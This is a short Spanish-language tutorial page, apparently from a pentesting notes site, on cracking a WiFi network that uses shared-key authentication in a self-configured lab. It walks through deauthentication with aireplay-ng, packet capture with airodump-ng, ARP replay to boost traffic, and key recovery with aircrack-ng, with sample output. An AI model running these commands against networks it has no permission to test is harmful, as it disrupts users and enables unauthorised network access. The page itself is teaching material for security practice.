Page cover

🌐Redes SKA

En esta sección vamos a hacer ataques a redes WiFi que tienen activada la opción de Share Key Autentication o "llave compartida".

Configurar red SKA

En el panel de control del WiFi habilitar la opción "Llave compartida"

1. Partimos de un Deauth

🌐Deauth
sudo aireplay-ng --deauth 1 -a 00:E0:4C:6A:5A:F8 -c 2A:2D:C8:0D:EB:F6 wlan0mon

2. Iniciar airodump-ng

Debemos guardar la salida con --write

# 4 - Iniciamos airodump-ng y guardamos la salida
sudo airodump-ng --bssid 00:E0:4C:6A:5A:F8 --channel 11 --write ska wlan0

Para el siguiente paso tendremos que utilizar la MAC de otro dispositivo en la red:

Importante: mantener abierto mientras se ejecuta aireplay-ng

3. ARP Replay

sudo aireplay-ng --help

Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
   >> --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --migmode           : attacks WPA migration mode  (-8)
      --test              : tests injection and quality (-9)
sudo aireplay-ng --arpreplay -b <SSID-OBJETIVO> -h <MAC-ADAPTADOR> <INTERFAZ> 
sudo aireplay-ng --arpreplay -b 00:E0:AC:6A:5A:F8 -h 2A:2D:C8:0D:EB:F6 wlan0mon 

Para aumentar la velocidad podemos apoyarnos de pequeños deauths:

Volviendo a airodump vemos que hemos aumentado correctamente el tráfico de red

4. Iniciar aircrack-ng

Abrir el archivo .cap

sudo aircrack-ng ska.cap
KEY FOUND! [12:34:56:78:90]
Password: 1234567890

Última actualización

¿Te fue útil?